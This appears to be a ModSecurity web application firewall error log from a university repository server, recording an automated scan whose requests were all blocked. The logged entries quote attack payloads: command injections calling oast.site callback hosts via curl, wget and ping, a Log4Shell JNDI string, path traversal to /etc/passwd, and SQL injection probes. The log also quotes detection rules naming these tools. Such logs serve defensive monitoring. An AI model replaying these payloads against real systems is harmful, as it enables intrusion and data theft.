[Tue Aug 29 11:33:12.804604 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgbrg671f3ffzx6.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgbrg671f3ffzx6.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARH7N0AAAAM"]
[Tue Aug 29 11:33:13.302850 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgtda9efxu4bpfy.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgtda9efxu4bpfy.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARYxDIAAAAJ"]
[Tue Aug 29 11:33:13.341610 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgum1bwp4jkrfit.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgum1bwp4jkrfit.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARD1TkAAAAH"]
[Tue Aug 29 11:33:14.389344 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAARQ37MAAAAB"]
[Tue Aug 29 11:33:14.458883 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAAQKOi4AAAAs"]
[Tue Aug 29 11:33:14.583406 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAAQKOjAAAAAs"]
[Tue Aug 29 11:33:18.122581 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlg614qzk9w3re1w.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11DsCo-f0AAARR29AAAAAF"]
[Tue Aug 29 11:33:18.739775 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlghmbt1r4zhwykd.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAAQKOj0AAAAs"]
[Tue Aug 29 11:33:19.007820 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11D8Co-f0AAARQ38cAAAAB"]
[Tue Aug 29 11:33:19.022258 2023] [:error] [pid 1136] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAARwuq8AAAAZ"]
[Tue Aug 29 11:33:19.336310 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11D8Co-f0AAARA7fMAAAAA"]
[Tue Aug 29 11:33:19.344644 2023] [:error] [pid 1134] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARu2qcAAAAW"]
[Tue Aug 29 11:33:20.370543 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11EMCo-f0AAARfwjoAAAAI"]
[Tue Aug 29 11:33:21.340584 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EcCo-f0AAANsAeQAAAAD"]
[Tue Aug 29 11:33:22.309593 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlgxur744uxi46gb.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EsCo-f0AAARR29QAAAAF"]
[Tue Aug 29 11:33:23.306752 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11E8Co-f0AAANsAegAAAAD"]
[Tue Aug 29 11:33:24.352379 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:Cmd: ping${IFS}-c${IFS}1${IFS}cjmn8l5jmimk2adbbnlgbpis6zos5musf.oast.site"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/admin.cgi"] [unique_id "ZO11FMCo-f0AAARjjL4AAAAL"]
[Tue Aug 29 11:33:24.375873 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11FMCo-f0AAARy-s8AAAAb"]
[Tue Aug 29 11:33:25.356472 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FcCo-f0AAARxOqoAAAAa"]
[Tue Aug 29 11:33:25.367502 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11FcCo-f0AAARdiJMAAAAK"]
[Tue Aug 29 11:33:26.441104 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FsCo-f0AAARjjMMAAAAL"]
[Tue Aug 29 11:33:26.486894 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11FsCo-f0AAANsAfQAAAAD"]
[Tue Aug 29 11:33:26.493579 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlgrzodcsgp6p93p.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11FsCo-f0AAARQ3@IAAAAB"]
[Tue Aug 29 11:33:27.345101 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11F8Co-f0AAARA7gcAAAAA"]
[Tue Aug 29 11:33:27.364379 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11F8Co-f0AAANsAfgAAAAD"]
[Tue Aug 29 11:33:27.387514 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11F8Co-f0AAARzXyMAAAAd"]
[Tue Aug 29 11:33:28.412857 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11GMCo-f0AAARy-t8AAAAb"]
[Tue Aug 29 11:33:29.327907 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11GcCo-f0AAARLXxEAAAAQ"]
[Tue Aug 29 11:33:31.419500 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repository.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11G8Co-f0AAAQKOlwAAAAs"]
[Tue Aug 29 11:33:31.423649 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ` found within XML: \\x0a    \\x0a    foo\\x0a    \\x0a        \\x0a            \\x0a                2\\x0a                \\x0a                    \\x0a                        \\x0a                            mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x0a                            \\x0a                                \\x0a                                \\x0a                                Compare\\x0a                                \\x0a                                \\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "repository.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11G8Co-f0AAAQKOlwAAAAs"]
[Tue Aug 29 11:33:32.029750 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAARo8zYAAAAT"]
